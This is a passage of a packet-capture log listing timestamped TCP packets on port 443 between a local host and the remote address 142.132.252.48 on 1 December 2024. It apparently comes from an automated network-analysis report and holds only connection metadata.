                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.102560997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.102571964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.102612019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.108212948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.108228922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.108290911 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.108300924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.108360052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.197941065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.197973013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.198050976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.198060989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.198193073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.198193073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.203094006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.203113079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.203320980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.203327894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.203414917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.273452044 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.273482084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.273530006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.273540020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.273561001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.273580074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.278353930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.278371096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.278480053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.278490067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.278601885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.292471886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.292493105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.292617083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.292632103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.292788982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.296511889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.298621893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.298639059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.298774958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.298784018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.299166918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.304053068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.304068089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.304130077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.304136992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.304250002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.304250002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.309544086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.309559107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.309617996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.309627056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.309674025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.399080038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.399101973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.399166107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.399175882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.399230957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.399230957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.404973030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.404989004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.405320883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.405328989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.405378103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.474689007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.474713087 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.474777937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.474785089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.474817991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.474817991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.479688883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.479703903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.479753017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.479758978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.479815960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.494460106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.494477987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.494672060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.494679928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.494817972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.499617100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.499633074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.499720097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.499747038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.499825001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.505356073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.505379915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.505501986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.505511045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.505562067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.510833979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.510849953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.510926008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.510932922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.511035919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.600663900 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.600687027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.600742102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.600752115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.600805044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.600805998 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.604764938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.606214046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.606230021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.606321096 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.606321096 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.606329918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.606420040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.676757097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.676776886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.676903963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.676920891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.676981926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.682581902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.682599068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.682707071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.682714939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.682764053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.696808100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.696825981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.696962118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.696973085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.697118998 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.701445103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.701467991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.701622963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.701653957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.701695919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.706561089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.706598043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.706670046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.706679106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.706727982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.706727982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.712120056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.712141037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.712244034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.712253094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.712304115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.813391924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.813416958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.813465118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.813473940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.813493013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.813533068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.818793058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.818809986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.818898916 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.818906069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.818953991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.873054981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.876977921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.877002954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.877083063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.877084017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.877100945 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.877198935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.882745981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.882761955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.882863998 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.882873058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.882944107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.897036076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.897053003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.897115946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.897123098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.897139072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.897171021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.902770042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.902786016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.903008938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.903017998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.903090000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.908195972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.908210993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.908267021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.908272982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.908334017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.913307905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.913322926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.913412094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.913417101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.913464069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.015335083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.015357971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.015459061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.015470982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.015515089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.020230055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.020256042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.020298004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.020311117 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.020384073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.020384073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.024126053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.081410885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.081429958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.081533909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.081533909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.081551075 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.081620932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.086302996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.086318016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.086416960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.086424112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.086539030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.098144054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.098160028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.098223925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.098237991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.098280907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.103848934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.103864908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.103967905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.103975058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.104042053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.109586954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.109601974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.109682083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.109695911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.109743118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.114531040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.114553928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.114598989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.114609957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.114645958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.114645958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.187297106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.216372967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.216407061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.216489077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.216506004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.216528893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.216571093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.222001076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.222017050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.222052097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.222071886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.222101927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.222126961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.282531977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.282555103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.282679081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.282694101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.282777071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.287786961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.287817955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.287857056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.287870884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.287902117 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.287902117 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.299643040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.299659967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.299741030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.299752951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.299799919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.303073883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.305928946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.305946112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.306021929 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.306031942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.306086063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.310523033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.310548067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.310612917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.310622931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.310671091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.316303015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.316368103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.316385984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.316395998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.316423893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.316459894 CET49721443192.168.2.6142.132.252.48
